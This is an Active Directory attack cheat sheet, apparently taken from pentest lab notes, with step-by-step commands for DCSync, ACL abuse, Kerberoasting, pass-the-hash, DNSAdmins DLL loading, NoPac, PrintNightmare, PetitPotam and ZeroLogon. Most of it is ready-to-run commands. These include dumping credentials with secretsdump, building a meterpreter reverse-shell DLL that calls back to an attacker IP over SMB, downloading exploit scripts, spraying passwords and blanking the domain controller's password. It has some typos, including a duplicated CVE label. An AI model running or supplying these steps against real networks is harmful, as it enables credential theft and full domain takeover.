Description

With GetChanges and GetChangesAll, we can perform a DCSync Attack. A DCSync Attack uses commands in the Directory Replication Service Remote Protocol (MS-DRSR), which is used by Domain Controllers to replicate domain data. DCSync uses MS-DRSR to simulate the behaviour of a domain controller and ask other domain controllers to replicate information.

Step 1

Use Secretsdump.py to get the Administrator's hash.

secretsdump.py {DOMAIN}/{USER}@{IP}

Step 2

Perform a Pass-the-Hash attack to login as Administrator.

evil-winrm -H {NTLM_HASH} -u Administrator -i {IP}

Requirements

The account needs to have WriteDACL permission.

Description

We have the ability to write new Account Control Entries (ACEs) to the target object's Discretionary Access Control List (DACL). This means that we can add a user to this group and give them DCSync privileges. DCSync privileges can be given by adding the user to the "Exchange Windows Permissions" group.

Step 1

Create a new user.

net user shelled abc123! /add /domain

Step 2

Add user to "Exchange Windows Permissions" group to give user DCSync permission. Also add user to "Remote Mannagement Users" localgroup to remote into the user's account.

net group "Exchange Windows Permissions" shelled /add

net localgroup "Remote Management Users" shelled /add

Step 3

Import PowerView to perform the exploit.

Import-Module PowerView.ps1

$pass = convertto-securestring 'abc123!' -asplain -force

$cred = new-object system.management.automation.pscredential('{DOMAIN}\shelled, $pass')

Add-ObjectACL -PrincipalIdentity shelled -Credential $cred -Rights DCSync

Step 4

Use Secretsdump.py to get the Administrator's hash.

secretsdump.py {DOMAIN}\shelled@{IP}

Step 5

Perform a Pass-the-Hack attack to login as Administrator.

evil-winrm -H {NTLM_HASH} -u Administrator -i {IP}

Description

The members of the compromised group have the capability to change the user's password in the other group without knowing that user's current password.

Step 1

If you have ForceChangePassword over a group then you can get a list of user's in that group and choose which user we want to change the password for. If you have ForceChangePassword over a user, then skip to step 2.

Get-ADGroupMember -Identity "OTHER_GROUP_NAME"

Step 2

Create a new password variable.

$Password = ConvertTo-SecureString "Password123!" -AsPlainText -Force

Step 3

Change one of the user's passwords to the password you created.

Set-ADAccountPassword -Identity "ACCOUNT" -Reset -NewPassword $Password

Description

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user. With GnericWrite over a user, we can perform a targeted kerberoasting attack.

Step 1

Download PowerView.ps1 and transfer it to the victim machine.

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Step 2

Import the PowerView.ps1 module.

Import-Module .\PowerView.ps1

Step 3

Modify the account's servicePrincipalName attribute to create a fake SPN that we can Kerberoast to obtain the TGS ticket and (hopefully) crack the hash offline using Hashcat or John the Ripper.

Set-DomainObject -Identity {USER_WE_WANT} -SET @{serviceprincipalname='nonexistent/BLAHBLAH'} -Verbose

Step 4

Kerberoast the ticket for the user we want.

Step 5

Crack the password.

hashcat -m 13100 /usr/share/wordlists/rockyou.txt --force

Description

GenericWrite to a group allows you to directly modify group membership of the group.

Step 1

Add our account to the group we have GenericWrite to.

Add-ADGroupMember "GROUP_NAME" -Members "ACCOUNT_NAME"

Description

In this situation we have

GenericWrite

GPO

Step 1

Download

SharpGPOAbuse.exe

wget https://github.com/byronkg/SharpGPOAbuse/releases/download/1.0/SharpGPOAbuse.exe

Step 2

Transfer

SharpGPOAbuse.exe

Step 3

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author {DOMAIN}\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators {CURRENT_USER} /add" --GPOName "{GPO_NAME}"

Step 3

Example

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"

Step 4

If you can, update the group policy.

gpupdate /force

Description

This grants us full control over a target object. This privilege allows the trustee to manipulate the target object however they wish. To take control over the user, we can do a Targeted Kerberoast Attack on the user or more simply just change the user's password.

Step 1

Create a new password variable.

$Password = ConvertTo-SecureString "Password123!" -AsPlainText -Force

Step 2

Change one of the user's passwords to the password you created.

Set-ADAccountPassword -Identity "ACCOUNT" -Reset -NewPassword $Password

Description

Kerberoasting involves extracting a hash of the encrypted material from a Kerberos “Ticket Granting Service” ticket reply (TGS_REP), which can be subjected to offline cracking in order to retrieve the plaintext password. This is possible because the TGS_REP is encrypted using the NTLM password hash of the account in whose context the service instance is running.

Step 1

Get TGT.

GetUserSPNs.py {DOMAIN}/{USER} -dc-ip {IP} -request

Step 2

Crack the hash.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Step 3

Login.

wmiexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

Description

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. Note: PtH is not possible with NTLMv2. NTLM has been succeeded by NTLMv2, which is a hardened version of the original NTLM protocol. NTLMv2 includes a time-based response, which makes simple pass the hash attacks impossible.

Step 1

This step is not needed, if you have obtained the NTLM hash other way, then you can go straight to step 2. This step is just a common way to dump credentials.

secretsdump.py {DOMAIN}/{USER}@{IP}

Step 2

evil-winrm -H {NTLM_HASH} -u administrator -i {IP}

Description

Members of DNSAdmins group have access to network DNS information. Being a member of the DNSAdmins group allows us to use the dnscmd.exe to specify a plugin DLL that should be loaded by the DNS service.

Step 1

Create a DLL using msfvenom, that changes the administrator password.

msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' - f dll > da.dll

Step 2

Transfering this file will likely trigger Windows Defender, so we are going to use Impacket's smbserver.py.

sudo smbserver.py share ./

Step 3

Use dnscmd utility to set the DLL.

cmd /c dnscmd localhost /config /serverlevelplugindll \{IP}\share\da.dll

Step 4

Restart the DNS service.

sc.exe stop dns

sc.exe start dns

Step 5

Login as Administrator with the new password we set.

sudo psexec.py {DOMAIN}/Administrator@{IP}

Requirements

Be part of the `LAPS_READER` group.

Description

The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

Step 1

Check if you are part of `LAPS_READER` group

Step 2

You can either search for the local admin password with this command, or use a script (Step 3). This command will return a lot of output, but the admin password will be in the field `ms-Mcs-AdmPwd`.

Get-ADComputer -Filter 'ObjectClass -eq "computer"' -Property *

Step 3

You can run this script.

wget https://github.com/n00py/LAPSDumper/raw/main/laps.py

like so:

python laps.py -u {USER} -p {PASSWORD} -d {DOMAIN}

Description

PowerShell Remoting also referred to as PSRemoting or Windows Remote Management (WinRM) access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.

Step 1

Use `evil-winrm` to remote into the computer (you will be prompt for a password).

evil-winrm -i {IP} -u {USER}

Description

An account with sysadmin privileges on an SQL Server instance can log into the instance remotely and execute queries against the database. This access can be used to run operating system commands in the context of the SQL Server service account through various methods.

Step 1

Get `mssqlclient.py` from Impacket.

pip install impacket

Step 2

mssqlclient.py {DOMAIN}/{USER}@{IP} -windows-auth

Step 3

Type `help` to get a list of available options.

Step 4

To get command execution, we can use the `enable_xp_cmdshell` command.

SQL> enable_xp_cmdshell

Step 5

We can now run commands in the format `xp_cmdshell <command>`.

SQL> xp_cmdshell whoami

Description

Once we obtain a list of valid users, we can password spray with a common password to try and login.

Step 1 - Windows

Get the DomainPasswordSpray tool below. If we are authenticated to the domain, the tool will automatically generate a user list from Active Directory, query the domain password policy, and exclude user accounts within one attempt of locking out.

wget https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1

Step 2 - Windows

Import-Module .\DomainPasswordSpray.ps1

Step 3 - Windows

Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

Description

NoPac, also reffered to as `SamAccountName Spoofing` is a vulnerability made up by two CVEs `CVE-2021-42278` and `CVE-2021-42287`, allowing for a standard domain user to escalate privileges to domain admin.

This exploit occurs by changing the SamAccountName of a computer (`DC1`) to a name similar to the SamAccountName of the Domain Controller (`DC1$`). Once done, we can request a TGT from our computer (`DC1`) and then rename our computer to something other than `DC1` and then request a TGS. When processing the TGS request, the KDC will fail to lookup for the requestor machine `DC1` (since we renamed it after requesting the TGT) and the KDC will perform another lookup appending a trailing $. The KDC lookup will succeed. As a result, the KDC will issue the ticket using the privileges of `DC1$`

CVE-2021-42287 - In case a TGS was requested for an account that could not be found, the KDC will attempt to search it again with a trailing \$.

CVE-2021-42287 - A normal user has permission to modify a machine account (up to 10 machines) and as its owner, they also have the permissions to edit its sAMAccountName.

For more information see this article: https://techcommunity.microsoft.com/t5/security-compliance-and-identity/sam-name-impersonation/ba-p/3042699

Step 1

Clone this repository and make sure impacket is installed

git clone https://github.com/Ridter/noPac

pip install impacket

Step 2

There's a script called `scanner.py` in the `NoPac` repository that we will use to check if the machine is vulnerable to `NoPac`.

python3 scanner.py {DOMAIN}/{USER}:{PASSWORD} -dc-ip {IP} -use-ldap

Step 3

Use the `noPac.py` script ti get a semi-interactive shell session established on the taget using `smbexec.py`.

sudo python3 noPac.py {DOMAIN}/{USER}:{PASSWORD} -dc-ip {IP}  -dc-host {DC_HOSTNAME} -shell --impersonate administrator -use-ldap

Example

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Description

PrintNightmare is the nickname given to two vulnerabilities (CVE-2021-34527) and (CVE-2021-1675) found in the Print Spooler service that runs on all Windows operating systems. This vulnerability allows a credentialed domain user to escalate privileges to domain admin. The PrintSpooler service is a service on Windows which allows printing. It is mainly used for managing print jobs which are sent to a print server from a client. The PrintSpooler service runs inside a process called `spoolsv.exe`.

The vulnerability in the PrintSpooler service is an authorization bypass bug which allows anyone to install print drivers using RPC function `RpcAddPrintDriverEx()`. We can use this vulnerability to inject a malicious driver that will run in the context of `spoolsv.exe` which is SYSTEM level privilege.

Step 1

Clone the repository.

git clone https://github.com/cube0x0/CVE-2021-1675.git

Step 2

For this exploit to work successfully, we will need to use cube0x0's version of Impacket.

pip3 uninstall impacket

git clone https://github.com/cube0x0/impacket

cd impacket

python3 ./setup.py install

Step 3

Check of machine is vulnerable by seeing if `Print System Asynchronous Protocol` and `Print System Remote Protocol` are exposed on the target.

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

Step 4

Craft a reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll

Step 5

Host the reverse shell on an SMB share

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

Step 6

Setup the reverse shell listener

use exploit/multi/handler

Step 7

Run the exploit

sudo python3 CVE-2021-1675.py {DOAMIN}/{USER}:{PASSWORD}@{IP}'\\{ATTACKER_IP}\path\to\backupscript.dll'

Description

PetitPotam (CVE-2021-36942) is an LSA spoofing vulnerability. This flaw allows an unauthenticated attacker to force a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC) by abusing Microsoft's Encrypting File System Remote Protocol (MS-EFSRPC) command EfsRpcOpenFileRaw. This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS) is in use.

In the attack, an authentication request from the targeted Domain Controller is relayed to the Certificate Authority (CA) host's Web Enrollment page and makes a Certificate Signing Request (CSR) for a new digital certificate. This certificate can then be used with a tool such as `gettgtkinit.py` to request a TGT for the Domain Controller, which can then be used to achieve domain compromise via a DCSync attack.

Step 1

Start `ntlmrelayx.py` and specify the Web Enrollment URL for the CA host.The CA is usually located at `https://<servername>/certsrv`.

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

Step 2

Get the PetitPotam tool

git clone https://github.com/topotam/PetitPotam.git

Step 3

Use PetitPotam to coerce the Domain Controller to authenticate to our host where `ntlmrelayx.py` is running.

python3 PetitPotam.py {ATTACKER_IP} {DC_IP}

Step 4

In `ntlmrelayx.py` we will see a successful login request and obtain the base64 encoded certificate for the Domain Controller if the attack is successful.

Step 5

Get the `gettgtpkinit.py` tool

git clone https://github.com/dirkjanm/PKINITtools

Step 6

Use the `gettgtpkinit.py` tool to request a TGT for the Domain Controller using the Base64 encoded certificate.

python3 gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSIb3DQEHAaCCEnAEghJsMIISaDCCCJ8GCSqGSIb3DQEHBqCCCJAwggiMAgEAMIIIhQYJKoZIhvcNAQcBMBwGCiqGS.....<SNIP>.....uiZwm1Pz70+e0p2GZNVZDXlrwQIyr7YCKBdGmY= dc01.ccache

Step 7

The TGT will be saved to a file called `dc01.ccache`, which we use to set the `KRB5CCNAME` environment variable, so our attack host uses this file for Kerberos authentication attempts.

export KRB5CCNAME=dc01.ccache

Step 8

Check that the TGT is saved using the `klist` command.

klist

Step 9

We can then use this TGT with `secretsdump.py` to perform a DCSYnc and retrieve one or all of the NTLM password hashes for the domain.

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Description

Zero Logon (CVE-2020-1472) allows an attacker to go from Zero to Domain Admin. Zero Logon abuses a poor implementation of crytography within MS-NRPC (Microsoft NetLogon Remote Protocol), MS-NRPC is a critical authentication component of Active Directory that handles authentication for User and Machine account.

Microsoft chose to use AES-CFB8 for a function called ComputeNetlogonCredential, which is normally fine, except they had hard coded the Initialization Vector to use all zeros instead of a random string. When an attacker sends a message only containing zeros with the IV of zero, there is a 1-in-256 chance the Ciphertext will be Zero.

Step 1

Run nmap to get the Domain Controller's Name

Step 2

Get this script

wget https://raw.githubusercontent.com/Sq00ky/Zero-Logon-Exploit/master/zeroLogon-NullPass.py

Step 3

Run the script using the Domain Controller's Name and the IP address.

python zeroLogon-NullPass.py DC01 10.10.209.179

Step 4

The script above changes the Administrator's password to a blank value. We can now use secretsdump.py to dump the NTLM password hashes.

secretsdump.py -just-dc -no-pass DC01$@10.10.209.179

Step 5

Use pass-the-hash or crack the hash to login as domain admin.